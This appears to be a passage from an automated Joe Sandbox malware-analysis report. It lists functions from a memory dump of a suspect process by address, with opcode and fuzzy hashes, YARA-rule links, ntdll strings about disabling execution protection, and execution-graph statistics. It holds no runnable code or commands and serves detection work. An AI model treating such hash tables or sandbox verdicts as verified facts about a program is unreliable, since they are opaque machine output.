                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 46039e0162f84c4740b6e32db67d873c11688a8014800351160ce8da7b5ec000
                                                                                                                                                                                                        • Instruction ID: bc2debc4a11ae5ca1fbdc64f8ee6db895ea418515335daa2104a681098e1bd4f
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 46039e0162f84c4740b6e32db67d873c11688a8014800351160ce8da7b5ec000
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E490023160510412D640615956147061005D7D1302F61C816A5418568DC7A58A5575A2
                                                                                                                                                                                                        Function 018429D0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 0f59faaec4c7ee826ca3b3e70b6baac1bc8888f419a338ec0441bd5d4f8b2cc0
                                                                                                                                                                                                        • Instruction ID: dbba4578d05369238e00d46df09c5ca3de61cd4bfeca3273594e86be7d01b0e4
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0f59faaec4c7ee826ca3b3e70b6baac1bc8888f419a338ec0441bd5d4f8b2cc0
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3E9002A1201140A24A40A2599504B0A4505D7E1302B51C41BE6048560CC5358955A135
                                                                                                                                                                                                        Function 018438D0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: e430993d2810d10b2be03c36758cac8941e32d8bc9b382ceee32c1041e36e70e
                                                                                                                                                                                                        • Instruction ID: 3830064f8405253bd806288d93adcd9b2dfb5d429781a44fe75122e8405bd31d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e430993d2810d10b2be03c36758cac8941e32d8bc9b382ceee32c1041e36e70e
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2E90022124505112D690715D55046164005F7E1302F51C426A5808594DC56589597221
                                                                                                                                                                                                        Function 01842B80 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 36b6e8c3d753de2895f934754b346876886d30dca7d80448cb63ac434638517b
                                                                                                                                                                                                        • Instruction ID: 40aa3ad4ed25438636c295fabffa1fe7513caed52f65def742f9e473b30cbc20
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 36b6e8c3d753de2895f934754b346876886d30dca7d80448cb63ac434638517b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0C90023120100852D64061595504B460005D7E1302F51C41BA5118654DC625C9557521
                                                                                                                                                                                                        Function 01842BE0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 1d17ebd64fd3e935e2ffb763dc48d48113ae95d5847b8b67343cd7ba9503922c
                                                                                                                                                                                                        • Instruction ID: bbfc38d679a3e2c5f0d24ebb4e33be7b13728086a5f78efd248d16cfa1e616f3
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1d17ebd64fd3e935e2ffb763dc48d48113ae95d5847b8b67343cd7ba9503922c
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1D90022160500412D680715965187060015D7D1302F51D416A5018554DC6698B5976A1
                                                                                                                                                                                                        Function 01842B00 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: f0e4e44953e8f2cefa345f0c061d03fc9715101ad9e3d1a5d24025b410033d87
                                                                                                                                                                                                        • Instruction ID: 9e5e0cda52d5650d057042cc4bfcb4e96472ba157df36af8e16a50be52cb9e74
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f0e4e44953e8f2cefa345f0c061d03fc9715101ad9e3d1a5d24025b410033d87
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5990023120504852D68071595504A460015D7D1306F51C416A5058694DD6358E59B661
                                                                                                                                                                                                        Function 01842AA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 788e54b9b783169ce066f429ce2732666a5a37ea2ce9d26ad5a5dc544bfd45d8
                                                                                                                                                                                                        • Instruction ID: 955c2be55ae8217e99e24fc291ee606584f0bc6858a34db471454f2d06a624f7
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 788e54b9b783169ce066f429ce2732666a5a37ea2ce9d26ad5a5dc544bfd45d8
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6290023120100812D644615959046860005D7D1302F51C416AB018655ED67589957131
                                                                                                                                                                                                        Function 01842AC0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: f03f27c0f1785db605bb4a8b0836cd74a3d101d4bb8f303aa052f18721cd163d
                                                                                                                                                                                                        • Instruction ID: 2020c75c417078e6d0ca9ee3f266ff11365a818ab813df54df4047a42cffbbcf
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f03f27c0f1785db605bb4a8b0836cd74a3d101d4bb8f303aa052f18721cd163d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3290023160500812D690715955147460005D7D1302F51C416A5018654DC7658B5976A1
                                                                                                                                                                                                        Function 01842A10 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 6c52cef55e3828cd6a5653fca3b328bf1f1ba4ee46df5ecb209508aa34f51c14
                                                                                                                                                                                                        • Instruction ID: f1beffc3053da4f544087248ee151c474ae23ba2ca8c47b98cac577155fee9cb
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6c52cef55e3828cd6a5653fca3b328bf1f1ba4ee46df5ecb209508aa34f51c14
                                                                                                                                                                                                        • Instruction Fuzzy Hash: DE900225221000120685A559170450B0445E7D7352391C41AF640A590CC63189696321
                                                                                                                                                                                                        Function 01842D50 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 34ee7c56f15dd2dffb0053ca46ab79d9c0357bf614fcf39c41da72aa83297150
                                                                                                                                                                                                        • Instruction ID: 5dcaf3e13a45b104aa48118d9709e171ced07a3ae8ab70cbe7a7a918216f17e2
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 34ee7c56f15dd2dffb0053ca46ab79d9c0357bf614fcf39c41da72aa83297150
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8690022130100412D642615955146060009D7D2346F91C417E6418555DC6358A57B132
                                                                                                                                                                                                        Function 01843C90 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: ad7f1002175aa348648acac938bfff305c876febc0b57edd85f4fe034d446c2d
                                                                                                                                                                                                        • Instruction ID: a7954b53336f5942f6d75ef3a7858d1754d1b78a3d4fcfed06d1280f7c7047da
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ad7f1002175aa348648acac938bfff305c876febc0b57edd85f4fe034d446c2d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2190023520100412DA50615969046460046D7D1302F51D816A5418558DC66489A5B121
                                                                                                                                                                                                        Function 01842CD0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 7ab769bb0b110f555e47a0e21e6f9d498239f0424fb5f53fbe1e65ac025c9df0
                                                                                                                                                                                                        • Instruction ID: 50ba3113b6ada4113c755cd21dfd71b55083154414d7fb50f1b1e10782dc11b8
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7ab769bb0b110f555e47a0e21e6f9d498239f0424fb5f53fbe1e65ac025c9df0
                                                                                                                                                                                                        • Instruction Fuzzy Hash: CF90023124100412D681715955046060009E7D1342F91C417A5418554EC6658B5ABA61
                                                                                                                                                                                                        Function 01842C10 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 2091173bef59c459cd59095e2a131e256de5f2b7ab322400fc5ee79f4c80cdda
                                                                                                                                                                                                        • Instruction ID: 9754d11e26a697fe96a99cac7652f9f0e5d53e22a7c8cab4526db38e7e9bec01
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2091173bef59c459cd59095e2a131e256de5f2b7ab322400fc5ee79f4c80cdda
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E190023120100413D640615966087070005D7D1302F51D816A5418558DD66689557121
                                                                                                                                                                                                        Function 01842C20 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: b5ea21d82864a9971b3b76b7fc55fb538f711e5a7d9e8c4911c928c35514db77
                                                                                                                                                                                                        • Instruction ID: 8f71b3a602710690bcd0cdda8ffa1ce6166f366546d6e67a877c0a235b689f93
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b5ea21d82864a9971b3b76b7fc55fb538f711e5a7d9e8c4911c928c35514db77
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0690022120504452D64065596508A060005D7D1306F51D416A6058595DC6358955B131
                                                                                                                                                                                                        Function 01843C30 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: cf898f9334f39081a90630f9cb49bb5cd7b8eed7032d1fff9c85d44ffb474a6b
                                                                                                                                                                                                        • Instruction ID: a5552858d5dc8de47e4cee74138249a1511d140712306d87bae846ff84514620
                                                                                                                                                                                                        • Opcode Fuzzy Hash: cf898f9334f39081a90630f9cb49bb5cd7b8eed7032d1fff9c85d44ffb474a6b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 94900231202001529A8062596904A4E4105D7E2303B91D81AA5009554CC92489656221
                                                                                                                                                                                                        Function 01842FB0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: fe14c710d3027816f4292de40090bbf9088ecb85c7f2c18c755a18b06eed2f3b
                                                                                                                                                                                                        • Instruction ID: fee2df24ec892e22415fa813a7b0ff61dc36f969c96ab19a07bf5c46b53feeb9
                                                                                                                                                                                                        • Opcode Fuzzy Hash: fe14c710d3027816f4292de40090bbf9088ecb85c7f2c18c755a18b06eed2f3b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0190022124100812D680715995147070006D7D1702F51C416A5018554DC6268A6976B1
                                                                                                                                                                                                        Function 01842F30 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 6c102676a99b546e62314e7dfcd4ee4358189ce82f3f45679163d6497d94ca39
                                                                                                                                                                                                        • Instruction ID: 3b081ced33f3255898ef875f930f4cbb5a67659a1c912488e45fa8e5569a723f
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6c102676a99b546e62314e7dfcd4ee4358189ce82f3f45679163d6497d94ca39
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2490022120144452D68062595904B0F4105D7E2303F91C41EA914A554CC92589596721
                                                                                                                                                                                                        Function 01842E80 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 9d162dd4f5c11f83a27ca37efcf781410201c6dfe950b0ddce18d3b55455305a
                                                                                                                                                                                                        • Instruction ID: b49127ded2264de4e8624792834acaed4a9d9a1d2d4d0871075a7b6001304d2d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9d162dd4f5c11f83a27ca37efcf781410201c6dfe950b0ddce18d3b55455305a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: A390026121100052D644615955047060045D7E2302F51C417A7148554CC5398D656125
                                                                                                                                                                                                        Function 01842EC0 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 769525321d7cc06207ed74fb3519db23d84b1013c8616b310fbaee08e648ab44
                                                                                                                                                                                                        • Instruction ID: 18074e5ceb67f882545265f21f4491eebe1a3188e91ad51520b24e2cad0cc7f9
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 769525321d7cc06207ed74fb3519db23d84b1013c8616b310fbaee08e648ab44
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4B90023120140412D640615959087470005D7D1303F51C416AA158555EC675C9957531
                                                                                                                                                                                                        Function 01842E00 Relevance: .0, Instructions: 4COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 9280e2ab69d1565cef4561d45c723b1ce68523c2d5a52f850c43ab5425cc2e8b
                                                                                                                                                                                                        • Instruction ID: d455c2ccd02ddf6359525035814ad6cf49eaf8f75d2c7767953af072301d90fe
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9280e2ab69d1565cef4561d45c723b1ce68523c2d5a52f850c43ab5425cc2e8b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2D90026120140413D680655959046070005D7D1303F51C416A7058555ECA398D557135
                                                                                                                                                                                                        Function 01842B20 Relevance: .0, Instructions: 2COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                                                                        • Instruction ID: a1bda6c2be24db6ec76ccdf2ddc1456221a733a323f02cd3ecc2110f76c3132c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                                                                                                        Function 01837550 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 01874592
                                                                                                                                                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01874460
                                                                                                                                                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 01874507
                                                                                                                                                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01874530
                                                                                                                                                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 0187454D
                                                                                                                                                                                                        • Execute=1, xrefs: 0187451E
                                                                                                                                                                                                        • ExecuteOptions, xrefs: 018744AB
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                                                                                                        • API String ID: 0-484625025
                                                                                                                                                                                                        • Opcode ID: 1853153b1cdf170639db0d001ee66f3f7f1707e91f176471a449392adb681495
                                                                                                                                                                                                        • Instruction ID: dd54aea136b9da77d1c5f353ebd65c18a5b69f427175e0c8d265bf1ba87e642a
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1853153b1cdf170639db0d001ee66f3f7f1707e91f176471a449392adb681495
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 125129B1A0021E6AEF15AB98DC95FA977A8AF58304F1804ADE605E71C1EB70DB41CF91
                                                                                                                                                                                                        Function 01809046 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30407190578.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_17d0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID: $$@
                                                                                                                                                                                                        • API String ID: 0-1194432280
                                                                                                                                                                                                        • Opcode ID: e29dcecb95368341a4e315b2e167959bb246a6c19465597467a8aa725a60749b
                                                                                                                                                                                                        • Instruction ID: e3669067adbb1fb3a5897b0ead1147e61bc4b9ff8802a1bff2595f3d7529768a
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e29dcecb95368341a4e315b2e167959bb246a6c19465597467a8aa725a60749b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B8811C71D002699BDB36CB58CC45BEEB6B8AB08714F0041EAEA09F7291E7705F858F61

                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                        Execution Coverage:1.5%
                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                        Signature Coverage:11.4%
                                                                                                                                                                                                        Total number of Nodes:79
                                                                                                                                                                                                        Total number of Limit Nodes:9
